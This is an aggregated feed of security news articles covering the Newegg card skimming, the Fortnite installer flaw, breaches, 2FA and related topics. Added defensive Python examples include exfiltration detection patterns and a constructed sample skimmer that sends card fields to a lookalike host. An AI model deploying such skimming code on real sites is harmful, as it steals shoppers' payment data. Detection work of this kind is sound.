Security

Password bypass flaw in Western Digital My Cloud drives puts data at risk

A security researcher has published details of a vulnerability in a popular cloud storage drive after the company failed to issue security patches for over a year.

Remco Vermeulen found a privilege escalation bug in Western Digital’s My Cloud devices, which he said allows an attacker to bypass the admin password on the drive, gaining “complete control” over the user’s data.

The exploit works because the drive’s web-based dashboard doesn’t properly check a user’s credentials before granting access to administrative functions that should require a higher privilege level.

The bug was “easy” to exploit, Vermeulen told TechCrunch in an email, and was remotely exploitable if a My Cloud device allows remote access over the internet — which thousands of devices do. He posted a proof-of-concept video on Twitter.

Details of the bug were also independently found by another security team, which released its own exploit code.

Vermeulen reported the bug over a year ago, in April 2017, but said the company stopped responding. Normally, security researchers give 90 days for a company to respond, in line with industry-accepted responsible disclosure guidelines.

After he found that WD had updated the My Cloud firmware in the meantime without fixing the vulnerability, he decided to publish his findings.

A year later, WD still hasn’t released a patch.

The company confirmed that it knows of the vulnerability but did not say why it took more than a year to issue a fix. “We are in the process of finalizing a scheduled firmware update that will resolve the reported issue,” a spokesperson said, which will arrive “within a few weeks.”

WD said that several of its My Cloud products are vulnerable — including the EX2, EX4 and Mirror, but not My Cloud Home.

In the meantime, Vermeulen said that there’s no fix and that users have to “just disconnect” the drive altogether if they want to keep their data safe.

Powered by WPeMatico

Hackers stole customer credit cards in Newegg data breach

Newegg is clearing up its website after a month-long data breach.

Hackers injected 15 lines of card skimming code on the online retailer’s payments page which remained for more than a month between August 14 and September 18, Yonathan Klijnsma, a threat researcher at RiskIQ, told TechCrunch. The code siphoned off credit card data from unsuspecting customers to a server controlled by the hackers with a similar domain name — likely to avoid detection. The server even used an HTTPS certificate to blend in.

The code was written to work on both the desktop and mobile versions of the checkout page, though it’s unclear whether mobile customers were actually affected.

The online electronics retailer removed the code on Tuesday after it was contacted by incident response firm Volexity, which first discovered the card skimming malware and reported its findings.

Newegg is one of the largest retailers in the US, making $2.65 billion in revenue in 2016. The company touts more than 45 million monthly unique visitors, but it’s not known precisely how many customers completed transactions during the period.

In an email to customers, Newegg chief executive Danny Lee said the company has “not yet determined which customer accounts may have been affected.” When reached, a Newegg spokesperson did not immediately comment.

Klijnsma called the incident “another well-disguised attack” that looked near-identical to the recent British Airways credit card breach, and earlier, the Ticketmaster breach. Like those breaches, RiskIQ attributed the Newegg credit card theft to the Magecart group, a collective of hackers that carry out targeted attacks against vulnerable websites.

The code used in both skimming attacks was near identical, according to the research.

“The breach of Newegg shows the true extent of Magecart operators’ reach,” said Klijnsma. “These attacks are not confined to certain geolocations or specific industries—any organization that processes payments online is a target.”

Like previous card skimming campaigns, he said that the hackers “integrated with the victim’s payment system and blended with the infrastructure and stayed there as long as possible.”
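As an added example (not RiskIQ’s or Volexity’s tooling, and not code from Newegg’s page), here is a Python heuristic a defender could run over a checkout page’s HTML to flag inline script that both touches payment form fields and sends data to a host outside an allowlist, and to call out hosts that are lookalikes of the first-party domain, the “similar domain name” trick described above. The domain acmestore.com, the allowlist and the sample page are constructed for the example.

```python
import difflib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical first-party shop domain and the hosts its checkout page may legitimately contact.
FIRST_PARTY = "acmestore.com"
ALLOWED_HOSTS = {"acmestore.com", "api.acmestore.com", "checkout.examplepay.com"}
LOOKALIKE_THRESHOLD = 0.7  # SequenceMatcher ratio above which a host is reported as a lookalike

URL_RE = re.compile(r"""https?://[^\s"'<>)]+""")
# Signs that a script hooks form submission or reads card fields ...
FORM_HOOK_RE = re.compile(r"""addEventListener\(\s*['"]submit|onsubmit|\.submit\s*=|card|cvv|cvc|expir""", re.I)
# ... and signs that it sends data somewhere.
EXFIL_RE = re.compile(r"""fetch\(|XMLHttpRequest|sendBeacon|new\s+Image\(|\.src\s*=""", re.I)


class ScriptCollector(HTMLParser):
    """Collects inline <script> bodies and external <script src> URLs from a page."""

    def __init__(self):
        super().__init__()
        self.inline = []
        self.external = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


def lookalike_ratio(host):
    """Similarity between a host and the first-party domain (1.0 = identical)."""
    return difflib.SequenceMatcher(None, host, FIRST_PARTY).ratio()


def analyze_checkout_page(html):
    """Return a list of {'host', 'reasons'} findings for suspicious scripts on the page."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []

    for body in parser.inline:
        hosts = {urlparse(u).hostname for u in URL_RE.findall(body)} - {None}
        touches_form = bool(FORM_HOOK_RE.search(body))
        sends_data = bool(EXFIL_RE.search(body))
        for host in sorted(hosts - ALLOWED_HOSTS):
            reasons = ["contacts a host outside the allowlist"]
            if touches_form and sends_data:
                reasons.append("reads payment form input and sends data off-site")
            ratio = lookalike_ratio(host)
            if ratio >= LOOKALIKE_THRESHOLD:
                reasons.append(f"lookalike of {FIRST_PARTY} (similarity {ratio:.2f})")
            findings.append({"host": host, "reasons": reasons})

    for src in parser.external:
        host = urlparse(src).hostname
        if host and host not in ALLOWED_HOSTS:
            findings.append({"host": host, "reasons": ["external script from a host outside the allowlist"]})
    return findings


# Constructed sample checkout page: a legitimate first-party call and a skimmer beaconing to a lookalike host.
SAMPLE_HTML = """
<html><body>
<form id="checkout"><input name="cardNumber"><input name="cvv"></form>
<script src="https://checkout.examplepay.com/v1/pay.js"></script>
<script>
  fetch('https://api.acmestore.com/cart').then(r => r.json());
</script>
<script>
  document.querySelector('#checkout').addEventListener('submit', function () {
    var d = {n: document.querySelector('[name=cardNumber]').value,
             c: document.querySelector('[name=cvv]').value};
    navigator.sendBeacon('https://acmestore-stats.com/collect', JSON.stringify(d));
  });
</script>
</body></html>
"""

if __name__ == "__main__":
    for finding in analyze_checkout_page(SAMPLE_HTML):
        print(finding["host"], "->", "; ".join(finding["reasons"]))
```

The regexes are deliberately crude: a skimmer that obfuscates its strings or builds the URL at runtime will slip past them, which is why this kind of scan belongs alongside preventive controls such as a Content Security Policy whose connect-src and form-action directives list only the first-party and payment-processor hosts, and Subresource Integrity on every external script.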

Anyone who entered their credit card data during the period should immediately contact their banks.

Five security settings in iOS 12 you should change right now

iOS 12, Apple’s latest mobile software for iPhone and iPad, is finally out. The new software packs in a bunch of new security and privacy features you’ve probably already heard about.

Here’s what you need to do to take advantage of the new settings and lock down your device.

1. Turn on USB Restricted Mode to make hacking more difficult

This hard-to-find new feature blocks data connections from accessories plugged into the Lightning port, such as USB cables and headphones, once your iPhone or iPad has been locked for more than an hour. That stops police and hackers alike from plugging in tools that brute-force or bypass your lock screen passcode to get at your data.

Go to Settings > Touch ID & Passcode and type in your passcode. Then scroll down to USB Accessories and make sure the setting is Off, so that accessories are not permitted while the device is locked. (On an iPhone X, check your Face ID settings instead.)

2. Make sure automatic iOS updates are turned on

Every time your iPhone or iPad updates, it comes with a slew of security patches to prevent crashes or data theft. Yet, how often do you update your phone? Most don’t bother unless it’s a major update. Now, iOS 12 can update your device behind the scenes, saving you downtime. Just make sure you switch it on.

Go to Settings > General > Software Update and turn on automatic updates.

3. Set a stronger device passcode

iOS has gotten better in recent years with passcodes. For years, it was a four-digit code by default, and now it’s six digits. That makes it far more difficult to run through every combination, an attack known as brute-forcing.

But did you know that you can set a number-only code of any length? Eight digits, twelve, even more, and it keeps the number keypad on the lock screen so you don’t have to fiddle around with the keyboard.

Go to Settings > Touch ID & Passcode and enter your passcode. Then, go to Change Passcode and, from the options, set a Custom Numeric Code.

4. Now, switch on two-factor authentication

Two-factor is one of the best ways to keep your account safe. If someone steals your password, they still need your phone to break into your account. For years, two-factor has been cumbersome and annoying. Now, iOS 12 has a new feature that auto-fills the code, so it takes the frustrating step out of the equation, and you have no excuse.

You may be asked to switch on two-factor when you set up your phone. You can also go to Settings and tap your name, then go to Password & Security. Just tap Turn on Two-Factor Authentication and follow the prompts.

5. While you’re here… change your reused passwords

iOS 12’s password manager has a new feature: password auditing. If it finds you’ve used the same password on multiple sites, it will warn you and advise you to change those passwords. That blunts password reuse attacks (known as “credential stuffing”), in which hackers take a username and password leaked from one site and try it against many other sites and services.

Go to Settings > Passwords & Accounts > Website & App Passwords and enter your passcode. You’ll see a small warning symbol next to each account that recognizes a reused password. One tap of the Change Password on Website button and you’re done.

Fido Alliance adds a biometrics certification program to help fight spoofing

In a move aimed at upping standards across biometric user verification systems, the industry consortium, Fido Alliance, has launched a certification program for biometrics systems.

“The goal of the Biometric Certification Component Program is to provide a framework for the certification of biometric subsystems that can in turn be integrated into FIDO Certified authenticators,” it writes on its website.

While biometric verification systems such as fingerprint readers have been pretty widely adopted in the mobile space already — with Apple introducing its fingerprint biometric, Touch ID, to the iPhone a full five years ago; followed, last fall, by a facial recognition biometric (Face ID) for its high end iPhone X — the Alliance says that, up to now, there hasn’t been a standardized way to validate the accuracy and reliability of biometric recognition systems in the commercial marketplace. Which is where it’s intending the new certification program to come in.

While few would doubt the robustness of Apple’s biometrics components (and testing regime), the sprawlingly diverse Android marketplace hosts all sorts of OEM players — which inevitably raises the risk of some lesser quality components (and/or processes) slipping in.

And in recent years there have been plenty of examples of poorly implemented biometrics, especially in the mobile space — with hackers easily able to crack into various Android devices that were using facial or iris recognition technology in trivially bypassable ways.

In 2017, for example, Chaos Computer Club members used a print out of an eye combined with a contact lens to fox iris scanners on the Samsung Galaxy S8. And that was one of the most sophisticated biometric hacks. Others have just required a selfie of the person to be held up in front of a ‘face unlock’ system to get an easy open sesame.

The not-for-profit Alliance, an industry group whose board includes security execs from the likes of Amazon, Google and Microsoft, among others, is on a mission to reduce reliance on passwords for digital security, because passwords inject friction into the online experience.

And biometrics do tend to be convenient, given they are attached to each person. Which is why they have been increasingly finding their way into smartphones and all sorts of other consumer electronics — from wearables to car tech, helped by component costs shrinking as biometrics adoption grows.

But it’s no good trying to speed up ID verification if the alternatives being reached for are badly implemented — and end up actively damaging security.

It certainly doesn’t have to be that way.

Apple’s biometrics are not so easily mocked. And while Touch ID is vulnerable to spoofing, like pretty much any fingerprint reader, its depth-mapping Face ID tech is by far the most sophisticated biometric implementation in the consumer electronics space to date. And hasn’t been meaningfully hacked (well, barring attacks by identical twins/strikingly similar looking family members).

So there’s clearly a world of difference (and, well, cost) between a well architected biometric recognition system which puts security considerations front and center, vs the awful sloppy stuff we’ve seen in recent years — where OEMs were just rushing to compete.

Biometrics has certainly often been treated more as a convenience gimmick for device marketing purposes, rather than viewed as a route to evolve (and even potentially enhance) device security.

The Alliance’s certification program is using accredited independent labs to test that biometric subcomponents meet what it dubs “globally recognized performance standards for biometric recognition performance and Presentation Attack Detection (PAD)” — and thus that they are “fit for commercial use”.

PAD refers to detecting presentation attacks: the various methods used to spoof a biometric sensor, such as presenting a silicone or gelatine fingerprint, or harvested facial photographs or video of the device owner.

So it looks like the Alliance’s hope for the program is to ‘upskill’ biometric implementations — or at least weed out the really stupid stuff.

“For customers, such as regulated online service providers, OEMs and enterprises, it provides a standardized way to trust that the biometric systems they are relying upon for fingerprint, iris, face and/or voice recognition can reliably identify users and detect presentation attacks,” it writes.

Speed is another goal too, as it says prior to this certification program due diligence was carried out by enterprise customers (or at least by those “who had the capacity to conduct such reviews”) — which required biometric vendors to repeatedly prove performance for each customer.

Whereas going forward vendors can use the program to test and certify just once to validate their system’s performance and re-use that third-party validation across the market, gaining what the Alliance bills as “substantial time and cost savings”.

Commenting in a statement, Brett McDowell, executive director of the Alliance, said: “While border control and law enforcement markets have mature assessment programs for their biometric systems, we were surprised that no such program existed for this rapidly growing consumer market.”

“With biometrics being a popular option for mobile and web applications implementing Fido Authentication, there is a growing need for those service providers to appropriately assess the risk of fraud from lost or stolen devices,” he added.

Asked whether the program had been introduced in response to particular concerns about weak consumer biometrics — given some of the aforementioned examples of poor implementations — McDowell also told us: “With the rise of any new technology, there’s a risk that some suppliers may over emphasize visible features at the expense of security considerations as they rush to market.

“This program, motivated by our online services community, mitigates that risk for mobile and desktop biometrics by providing a commercial-grade benchmark and independent lab assessment for performance features and spoof attack detection security considerations. Another benefit of the program is a clear way for service providers to prove compliance with strong authentication regulation, which is becoming the norm for financial services. This trend is expected to expand to other sectors as passwords continue to be exploited at increasingly alarming rates.”

Currently only one lab has been accredited to perform components testing for the program.

The lab, iBeta, is located in the U.S. but a spokeswoman for the Fido Alliance told us: “The Alliance is actively working to bring in additional labs.”

She added that the Alliance will update this list as more are added.

This post was updated with additional comment from McDowell 

Fortnite’s Android installer shipped with an Epic security flaw

Google has clapped back in tremendous fashion at Epic Games, which earlier this month decided to make the phenomenally popular Fortnite available for Android via its own website instead of Google’s Play Store. Unfortunately, the installer had a phenomenally dangerous security flaw in it that would allow a malicious actor to essentially install any software they wanted. Google wasted exactly zero time pointing out this egregious mistake.

By way of a short explanation why this was even happening, Epic explained when it announced its plan that it would be good to have “competition among software sources on Android,” and that the best would “succeed based on merit.” Everyone of course understood that what Epic meant was that it didn’t want to share the revenue from its cash cow with Google, which takes 30 percent of in-app purchases.

Many warned that this was a security risk for several reasons, for example that users would have to enable app installations from unknown sources — something most users have no reason to do. And the Play Store has other protections and features, visible and otherwise, that are useful for users.

Google, understandably, was not amused with Epic’s play, which no doubt played a part in the decision to scrutinize the download and installation process — though I’m sure the safety of its users was also a motivating factor. And wouldn’t you know it, they found a whopper right off the bat.

In a thread posted a week after the Fortnite downloader went live, a Google engineer by the name of Edward explained that the installer basically would allow an attacker to install anything they want using it.

The Fortnite installer basically downloads an APK (the package for Android apps), stores it locally, then launches it. But because it was stored on shared external storage, which any other app holding the storage permission can read and write, a bad guy could swap in a new file for it to launch, in what’s called a “man in the disk” attack.

And because the installer only checked that the name of the APK is right, as long as the attacker’s file is called “com.epicgames.fortnite,” it would be installed! Silently, and with whatever extra permissions the attacker’s APK declares, because once the user has allowed the installer to install from unknown sources, the system installs whatever package the installer hands it. Not good!
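To make the flaw concrete, here is an added Python sketch, not Epic’s or Google’s code, that models the two installer designs on an ordinary filesystem: a shared temporary directory stands in for external storage, a directory created with mode 0700 stands in for app-private storage, and the package name com.example.game.apk, its bytes and its pinned digest are made-up placeholders. The vulnerable version checks only the file name and then re-reads the path, so another app can rewrite the file in between; the hardened version keeps the file where other apps cannot reach it, hashes the bytes it actually holds, and launches exactly those bytes.

```python
import hashlib
import hmac
import os
import tempfile

# Placeholder package name and contents; the real installer's name, APK and digest are not on this page.
EXPECTED_NAME = "com.example.game.apk"
GENUINE = b"PK\x03\x04 genuine package bytes"       # constructed stand-in for the real APK
MALICIOUS = b"PK\x03\x04 attacker-supplied bytes"   # constructed stand-in for a swapped-in APK


def vulnerable_install(download_dir, filename, launch, other_app=None):
    """Models the flaw: the only check is the file name, the file sits in a shared
    world-writable directory, and whatever is there at launch time gets installed."""
    path = os.path.join(download_dir, filename)
    if os.path.basename(path) != EXPECTED_NAME:
        raise ValueError("unexpected package name")
    if other_app is not None:
        other_app(path)  # another app with storage permission gets a turn between check and launch
    with open(path, "rb") as f:          # re-reads the path: time-of-check / time-of-use gap
        return launch(f.read())


def hardened_install(fetch_package, expected_sha256, launch):
    """Download into app-private storage, verify the digest of the bytes in hand, and launch
    exactly those bytes rather than re-reading a path that someone else could rewrite."""
    private_dir = tempfile.mkdtemp(prefix="installer-")   # mkdtemp creates the directory with mode 0700
    path = os.path.join(private_dir, EXPECTED_NAME)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(fetch_package())
    with open(path, "rb") as f:
        data = f.read()                   # read once; the same buffer is hashed and launched
    digest = hashlib.sha256(data).hexdigest()
    if not hmac.compare_digest(digest, expected_sha256):
        os.remove(path)
        raise ValueError("package digest mismatch")
    return launch(data)


def demo_vulnerable():
    """Attacker overwrites the file after the name check; the malicious bytes are launched."""
    shared = tempfile.mkdtemp(prefix="shared-")           # stands in for shared external storage
    with open(os.path.join(shared, EXPECTED_NAME), "wb") as f:
        f.write(GENUINE)

    def attacker_swap(path):                              # the man-in-the-disk step
        with open(path, "wb") as f:
            f.write(MALICIOUS)

    return vulnerable_install(shared, EXPECTED_NAME, launch=lambda b: b, other_app=attacker_swap)


def demo_hardened(tampered):
    """Digest pinned at build time; a tampered download is rejected, a genuine one is launched."""
    expected = hashlib.sha256(GENUINE).hexdigest()
    fetch = (lambda: MALICIOUS) if tampered else (lambda: GENUINE)
    try:
        return hardened_install(fetch, expected, launch=lambda b: b)
    except ValueError:
        return None


if __name__ == "__main__":
    print("vulnerable launched:", demo_vulnerable())
    print("hardened, genuine:  ", demo_hardened(tampered=False))
    print("hardened, tampered: ", demo_hardened(tampered=True))
```

On Android the equivalents are the app’s internal storage directory rather than external storage, and checking the downloaded APK’s signing certificate or a pinned digest before handing it to the package installer; a name check on a world-writable path buys nothing.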

Edward pointed out this could be fixed easily and in a magnificently low-key bit of shade-throwing helpfully linked to a page on the Android developer site outlining the basic feature Epic should have used.

To Epic’s credit, its engineers jumped on the problem immediately, had a fix in the works by that very afternoon and deployed it by the next one. Epic InfoSec then asked Google to wait 90 days before publishing the details.

As you can see, Google was not feeling generous. One week later (that’s today) and the flaw has been published on the Google Issue Tracker site in all its… well, not glory exactly. Really, the opposite of glory. This seems to have been Google’s way of warning any would-be Play Store mutineers that they would not be given gentle handling.

Epic Games CEO Tim Sweeney was likewise unamused. In a comment provided to Android Central — which, by the way, predicted that this exact thing would happen — he took the company to task for its “irresponsible” decision to “endanger users.”

Epic genuinely appreciated Google’s effort to perform an in-depth security audit of Fortnite immediately following our release on Android, and share the results with Epic so we could speedily issue an update to fix the flaw they discovered.

However, it was irresponsible of Google to publicly disclose the technical details of the flaw so quickly, while many installations had not yet been updated and were still vulnerable.

An Epic security engineer, at my urging, requested Google delay public disclosure for the typical 90 days to allow time for the update to be more widely installed. Google refused. You can read it all at https://issuetracker.google.com/issues/112630336

Google’s security analysis efforts are appreciated and benefit the Android platform, however a company as powerful as Google should practice more responsible disclosure timing than this, and not endanger users in the course of its counter-PR efforts against Epic’s distribution of Fortnite outside of Google Play.

Indeed, companies really should try not to endanger their users for selfish reasons.

Epic Games just gave a perk for folks to turn on 2FA; every other big company should, too

Let’s talk a bit about security.

Most internet users around the world are pretty crap at it, but there are basic tools that companies have, and users can enable, to make their accounts, and lives, a little bit more hacker-proof.

One of these — two-factor authentication — just got a big boost from Epic Games, the maker of what is currently The Most Popular Game In The World: Fortnite.

Epic is already getting a ton of great press for what amounts to very little effort.

Son: Do you know what two-factor authentication is?
Me: Uh, yeah?
Son: I get a free dance on @Fortnitegame if I enable two factor. Can we do that?

Incentives matter.

— Dennis (@DennisF) August 23, 2018

The company is giving users a new emote (the victory dance you’ve seen emulated in airports, playgrounds and parks by kids and tweens around the world) to anyone who turns on two-factor authentication. It’s one small (dance) step for Epic, but one giant leap for securing their users’ accounts.

The thing is any big company could do this (looking at you Microsoft, Apple, Alphabet and any other company with a huge user base).

Apparently the perk of not getting hacked isn’t enough for most users, but if you give anyone the equivalent of a free dance, they’ll likely flock to turn on the feature.

It’s not that two-factor authentication is a panacea for all security woes, but it does make life harder for hackers. Two-factor authentication works on one-time codes, basically tokens, that are either sent to you via text message or generated locally by an authenticator app. Text messaging is a pretty crap way to secure things, because the codes can be intercepted and the phone number itself can be hijacked by porting it to a SIM card the attacker controls. Authenticator apps like Google Authenticator or Authy instead derive each code from a secret stored on the device, so nothing travels over the carrier network at all (much harder to intercept, but it does require installing an app).

So using SMS-based two-factor authentication is better than nothing, but it’s not Fort Knox (however, these days, even Fort Knox probably isn’t Fort Knox when it comes to security).

Still, anything that makes things harder for crimes of opportunity can help ease the security burden for companies large and small, and the consumers and customers that love them (or at least are forced to pay and use them).

I’m not sure what form the perk could or should take. Maybe it’s the promise of a free e-book or a free download or an opportunity to have a live chat with the celebrity, influencer or athlete of a user’s choice. Whatever it is, there’s clearly something that businesses could do to encourage greater adoption.

Self-preservation isn’t cutting it. Maybe an emote will do the trick.

Security researchers found a way to hack into the Amazon Echo

Hackers at DefCon have exposed new security concerns around smart speakers. Tencent’s Wu HuiYu and Qian Wenxiang spoke at the security conference with a presentation called Breaking Smart Speakers: We are Listening to You, explaining how they hacked into an Amazon Echo speaker and turned it into a spy bug.

The hack involved a modified Amazon Echo, which had parts swapped out, including some that had been soldered on. The modified Echo was then used to hack into other, non-modified Echos by connecting both the hackers’ Echo and a regular Echo to the same LAN.

This allowed the hackers to turn their own, modified Echo into a listening bug, relaying audio from the other Echo speakers without those speakers indicating that they were transmitting.

This method was very difficult to execute, but represents an early step in exploiting Amazon’s increasingly popular smart speaker.

The researchers notified Amazon of the exploit before the presentation, and Amazon has already pushed a patch, according to Wired.

Still, the presentation demonstrates how one Echo running malicious firmware could potentially compromise a group of speakers connected to the same network, which raises concerns about Echos deployed in hotels.

Wired explained how the networking feature of the Echo allowed for the hack:

If they can then get that doctored Echo onto the same Wi-Fi network as a target device, the hackers can take advantage of a software component of Amazon’s speakers, known as Whole Home Audio Daemon, that the devices use to communicate with other Echoes in the same network. That daemon contained a vulnerability that the hackers found they could exploit via their hacked Echo to gain full control over the target speaker, including the ability to make the Echo play any sound they chose, or more worryingly, silently record and transmit audio to a faraway spy.

An Amazon spokesperson told Wired that “customers do not need to take any action as their devices have been automatically updated with security fixes,” adding that “this issue would have required a malicious actor to have physical access to a device and the ability to modify the device hardware.”

To be clear, the actor would only need physical access to their own Echo, plus a foothold on the same local network as the target, to execute the hack.

While Amazon has dismissed concerns that its voice activated devices are monitoring you, hackers at this year’s DefCon proved that they can be made to.

Dixons Carphone says millions more customers affected by 2017 breach

A Dixons Carphone data breach that was disclosed earlier this summer was worse than initially reported. The company is now saying that personal data of 10 million customers could also have been accessed when its systems were hacked.

The European electronics and telecoms retailer believes its systems were accessed by unknown and unauthorized person/s in 2017, although it only disclosed the breach in June, after discovering it during a review of its security systems.

Last month it said 5.9M payment cards and 1.2M customer records had been accessed. But with its investigation into the breach “nearing completion”, it now says approximately 10M records containing personal data (but no financial information) may have been accessed last year — in addition to the 5.9M compromised payment cards it disclosed last month.

“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated,” the company said in a statement.

In terms of what personal data the 10M records contained, a Dixons Carphone spokeswoman told us: “This continues to relate to personal data, and the types of data that may have been accessed are, for example, name, address or email address.”

The company says it’s taking the precaution of contacting all its customers — to apologize and advise them of “protective steps to minimize the risk of fraud”.

It adds it has no evidence that the unauthorized access is continuing, having taken steps to secure its systems when the breach was discovered last month, saying: “We continue to make improvements and investments at pace to our security environment through enhanced controls, monitoring and testing.”

Commenting in a statement, Dixons Carphone CEO, Alex Baldock, added: “Since our data security review uncovered last year’s breach, we’ve been working around the clock to put it right. That’s included closing off the unauthorised access, adding new security measures and launching an immediate investigation, which has allowed us to build a fuller understanding of the incident that we’re updating on today.

“Again, we’re disappointed in having fallen short here, and very sorry for any distress we’ve caused our customers. I want to assure them that we remain fully committed to making their personal data safe with us.”

Back in 2015, Carphone Warehouse, a mobile division of Dixons Carphone, also suffered a hack which affected around 3M people. And in January the company was fined £400k by the ICO as a consequence of that earlier breach.

Since then new European Union regulations (GDPR) have come into force which greatly raise the maximum penalties which regulators can impose for serious data breaches.

Last month, following Dixon’s disclosure of the latest breach, the UK’s data watchdog, the ICO, told us it was liaising with the National Cyber Security Centre, the Financial Conduct Authority and other relevant agencies to ascertain the details and impact on customers.

Of the 5.9M payment cards which Dixons disclosed last month as having been compromised, it said the vast majority had been protected by chip and PIN technology. But around 105,000 lacked that protection, so Dixons said at the time that those could have been compromised.

It’s the additional 1.2M records containing non-financial personal data — such as name, address or email address — that have been revised upwards now, to ~10M records, which constitutes almost half the Group’s customer base in the UK and Ireland.

The spokeswoman told us the Group has approximately 22M customers in the region.

https://www.ncsc.gov.uk/guidance/ncsc-advice-dixons-carphone-plc-customers

Instagram is building non-SMS 2-factor auth to thwart SIM hackers

Hackers can steal your phone number by reassigning it to a different SIM card, use it to reset your passwords, steal your Instagram and other accounts and sell them for bitcoin. As detailed in a harrowing Motherboard article today, Instagram accounts are especially vulnerable because the app only offers two-factor authentication through SMS that delivers a password reset or login code via text message.

But now Instagram has confirmed to TechCrunch that it’s building a non-SMS two-factor authentication system that works with authenticator apps like Google Authenticator or Duo. These apps generate a time-based login code from a secret stored on your phone itself, so the code can’t be generated on a different phone even if your number is ported to a hacker’s SIM card.

Buried in the Instagram Android app’s APK code is a prototype of the upgraded 2FA feature, discovered by frequent TechCrunch tipster Jane Manchun Wong. Her work has led to confirmed TechCrunch scoops on Instagram Video Calling, Usage Insights, soundtracks for Stories and more.

When presented with the screenshots, an Instagram spokesperson told TechCrunch that yes, it is working on the non-SMS 2FA feature, saying, “We’re continuing to improve the security of Instagram accounts, including strengthening 2-factor authentication.”

Instagram actually lacked any two-factor protection until 2016 when it already had 400 million users. In November 2015, I wrote a story titled “Seriously. Instagram Needs Two-Factor Authentication.” A friend and star Instagram stop-motion animation creator Rachel Ryle had been hacked, costing a lucrative sponsorship deal. The company listened. Three months later, the app began rolling out basic SMS-based 2FA.

But since then, SIM porting has become a much more common problem. Hackers typically call a mobile carrier and use social engineering tactics to convince them they’re you, or bribe an employee to help, and then change your number to a SIM card they control. Whether they’re hoping to steal intimate photos, empty cryptocurrency wallets or sell desirable social media handles like @t or @Rainbow as Motherboard reported, there are plenty of incentives to try a SIM porting attack. This article outlines how you can take steps to protect your phone number.

Hopefully as knowledge of this hacking technique becomes more well-known, more apps will introduce non-SMS 2FA, mobile providers will make it tougher to port numbers and users will take more steps to safeguard their accounts. As our identities and assets increasingly go digital, it’s pin codes and authenticator apps, not just deadbolts and home security systems, that must become a part of our everyday lives.

Court victory legalizes 3D-printable gun blueprints

A multi-year legal battle over the ability to distribute computer models of gun parts and replicate them in 3D printers has ended in defeat for government authorities who sought to prevent the practice. Cody Wilson, the gunmaker and free speech advocate behind the lawsuit, now intends to expand his operations, providing printable gun blueprints to all who desire them.

The longer story of the lawsuit is well told by Andy Greenberg over at Wired, but the decision is eloquent on its own. The fundamental question is whether making 3D models of gun components available online is covered by the free speech rights granted by the First Amendment.

This is a timely but complex conflict because it touches on two themes that happen to be, for many, ethically contradictory. Arguments for tighter restrictions on firearms are, in this case, directly opposed to arguments for the unfettered exchange of information on the internet. It’s hard to advocate for both here: restricting firearms and restricting free speech are one and the same.

That at least seems to be the conclusion of the government lawyers, who settled Wilson’s lawsuit after years of court battles. In a copy of the settlement provided to me by Wilson, the U.S. government agrees to exempt “the technical data that is the subject of the Action” from legal restriction. The modified rules should appear in the Federal Register soon.

What does this mean? It means that a 3D model that can be used to print the components of a working firearm is legal to own and legal to distribute. You can likely even print it and use the product; you just can’t sell it. There are technicalities to the law here (certain parts are restricted, but can be sold in an incomplete state, etc.), but the implications as regards the files themselves seem clear.

Wilson’s original vision, which he is now pursuing free of legal obstacles, is a repository of gun models, called DEFCAD, much like any other collection of data on the web, though naturally considerably more dangerous and controversial.

“I currently have no national legal barriers to continue or expand DEFCAD,” he wrote in an email to TechCrunch. “This legal victory is the formal beginning to the era of downloadable guns. Guns are as downloadable as music. There will be streaming services for semi-automatics.”

The concepts don’t map perfectly, no doubt, but it’s hard to deny that with the success of this lawsuit, there are few legal restrictions to speak of on the digital distribution of firearms. Even before it, there were few technical restrictions: certainly, just as you could download MP3s on Napster in 2002, you can download a gun file today.

Gun control advocates will no doubt argue that greater availability of lethal weaponry is the opposite of what is needed in this country. But others will point out that in a way this is a powerful example of how liberally free speech can be defined. It’s important to note that both of these things can be true.

This court victory settles one case, but marks the beginning of many others. “I have promoted my values for years with great care and diligence,” Wilson wrote. It’s hard to disagree with that. Those whose values differ are free to pursue them in their own way; perhaps they too will be awarded victories of this scale.
